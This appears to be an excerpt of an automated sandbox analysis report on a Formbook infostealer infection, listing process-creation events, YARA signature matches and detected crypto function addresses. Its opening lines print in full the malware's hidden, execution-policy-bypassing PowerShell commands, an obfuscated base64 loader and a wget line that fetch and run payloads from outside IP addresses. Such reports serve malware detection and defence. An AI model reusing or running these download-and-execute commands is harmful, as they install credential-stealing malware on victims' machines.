Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm .vbs,.wsf	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD	Jump to behavior

Yara signature match

Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.powershell.exe.181ccfb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 12.2.powershell.exe.181b4def050.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 15.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 12.2.powershell.exe.181b586e7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.422768755.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.496318132.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.422446596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932465488.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.516637201.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932661914.0000000003C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.526166021.0000000000D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.525982132.0000000000B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.932348490.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.525904242.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.517447397.0000000002738000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.449978783.00000181C4D54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000C.00000002.449357348.00000181C4CE6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.448761827.00000181C4C37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.477642007.000000000D70E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: Process Memory Space: powershell.exe PID: 6096, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 2328, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR	Matched rule: SUSP_Reversed_Base64_Encoded_EXE date = 2020-04-06, hash1 = 7e6d9a5d3b26fd1af7d58be68f524c4c55285b78304a65ec43073b139c9407a8, author = Florian Roth, description = Detects an base64 encoded executable with reversed characters, reference = Internal Research, score = file
Source: Process Memory Space: powershell.exe PID: 6996, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5076, type: MEMORYSTR	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Detected potential crypto function

Source: C:\Windows\explorer.exe	Code function: 6_2_027288FB	6_2_027288FB
Source: C:\Windows\explorer.exe	Code function: 6_2_0272B2FF	6_2_0272B2FF
Source: C:\Windows\explorer.exe	Code function: 6_2_02729362	6_2_02729362
Source: C:\Windows\explorer.exe	Code function: 6_2_02729359	6_2_02729359
Source: C:\Windows\explorer.exe	Code function: 6_2_02728902	6_2_02728902
Source: C:\Windows\explorer.exe	Code function: 6_2_0272FD02	6_2_0272FD02
Source: C:\Windows\explorer.exe	Code function: 6_2_0272B302	6_2_0272B302
Source: C:\Windows\explorer.exe	Code function: 6_2_0272EF06	6_2_0272EF06
Source: C:\Windows\explorer.exe	Code function: 6_2_0272D7B2	6_2_0272D7B2
Source: C:\Windows\explorer.exe	Code function: 6_2_043EE2FF	6_2_043EE2FF
Source: C:\Windows\explorer.exe	Code function: 6_2_043EB8FB	6_2_043EB8FB
Source: C:\Windows\explorer.exe	Code function: 6_2_043F1F06	6_2_043F1F06
Source: C:\Windows\explorer.exe	Code function: 6_2_043EB902	6_2_043EB902
Source: C:\Windows\explorer.exe	Code function: 6_2_043EE302	6_2_043EE302
Source: C:\Windows\explorer.exe	Code function: 6_2_043F2D02	6_2_043F2D02
Source: C:\Windows\explorer.exe	Code function: 6_2_043EC362	6_2_043EC362
Source: C:\Windows\explorer.exe	Code function: 6_2_043EC359	6_2_043EC359
Source: C:\Windows\explorer.exe	Code function: 6_2_043F07B2	6_2_043F07B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00401030	15_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0040909B	15_2_0040909B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004090A0	15_2_004090A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00401209	15_2_00401209
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00402D88	15_2_00402D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00402D90	15_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041D7DD	15_2_0041D7DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0041CFAA	15_2_0041CFAA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_00402FB0	15_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E22AE	15_2_029E22AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029CFA2B	15_2_029CFA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0294EBB0	15_2_0294EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029D03DA	15_2_029D03DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029DDBD2	15_2_029DDBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E2B28	15_2_029E2B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0293AB40	15_2_0293AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0292B090	15_2_0292B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029420A0	15_2_029420A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E20A8	15_2_029E20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E28EC	15_2_029E28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029D1002	15_2_029D1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029EE824	15_2_029EE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0291F900	15_2_0291F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02934120	15_2_02934120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E2EF7	15_2_029E2EF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029DD616	15_2_029DD616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02936E30	15_2_02936E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029EDFCE	15_2_029EDFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E1FF1	15_2_029E1FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0292841F	15_2_0292841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029DD466	15_2_029DD466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02942581	15_2_02942581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E25DD	15_2_029E25DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0292D5E0	15_2_0292D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E2D07	15_2_029E2D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_02910D20	15_2_02910D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_029E1D55	15_2_029E1D55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0406841F	27_2_0406841F
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0411D466	27_2_0411D466
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04122D07	27_2_04122D07
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04050D20	27_2_04050D20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04121D55	27_2_04121D55
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04082581	27_2_04082581
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_041225DD	27_2_041225DD
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0406D5E0	27_2_0406D5E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0411D616	27_2_0411D616
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04076E30	27_2_04076E30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04122EF7	27_2_04122EF7
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0412DFCE	27_2_0412DFCE
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04121FF1	27_2_04121FF1
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_04111002	27_2_04111002
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0412E824	27_2_0412E824
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0407A830	27_2_0407A830
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 27_2_0406B090	27_2_0406B090
